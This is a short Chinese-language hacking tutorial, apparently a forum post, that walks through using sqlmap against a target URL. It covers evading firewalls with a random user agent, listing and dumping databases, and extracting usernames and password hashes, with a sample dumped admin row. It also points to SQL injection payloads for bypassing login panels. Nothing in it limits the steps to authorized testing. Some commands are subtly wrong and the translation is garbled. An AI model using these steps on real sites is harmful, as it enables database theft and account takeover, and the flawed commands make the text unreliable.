首先安装sqlmap,在linux上sudo apt install sqlmap,在windows上下载cmder(
https://github.com/cmderdev/cmder/releas.../cmder.zip)并执行同样的命令。
如果你不想打扰像 --risk 或 --level 和其他许多参数,只使用 sqlmap -u url --batch 运行 sqlmap,这将自动化它,你也可以使用 --random-agent 来对抗一些防火墙保护。
如果您想直接转储数据库,请使用以下参数:
sqlmap -u url --dbs(这将显示所有易受攻击的数据库)
sqlmap -u url -D selected_database (这将选择一个数据库)
sqlmap -u url -T selected_user (这将从数据库中获取一个用户并显示他的用户名和密码)
结果应如下所示:
+----+--------------------+------------+------------ +------------+------------+------------+------------ ------+
| 编号 | 散列 | 姓名 | 电邮 | 密码 | 许可 | 系统主页 | system_allow_only |
+----+--------------------+------------+------------ +------------+------------+------------+------------ ------+
| 1 | 5DIpzzDHFOwnCvPonu | 管理员 | <空白> | <空白> | 3 | <空白> | <空白> |
+----+--------------------+------------+------------ +------------+------------+------------+------------ ------+
如何使用sql注入技术绕过登录面板:
隐藏内容
如果你想利用登录页面/管理面板,你需要一个 sql 负载,
它们的列表和解释:
http://www.securityidiots.com/Web-Pentes...ction.html
Theres 解释了要“粘贴”的内容进入用户名和密码字段,我目前正在制作一个应该自动化它的工具。
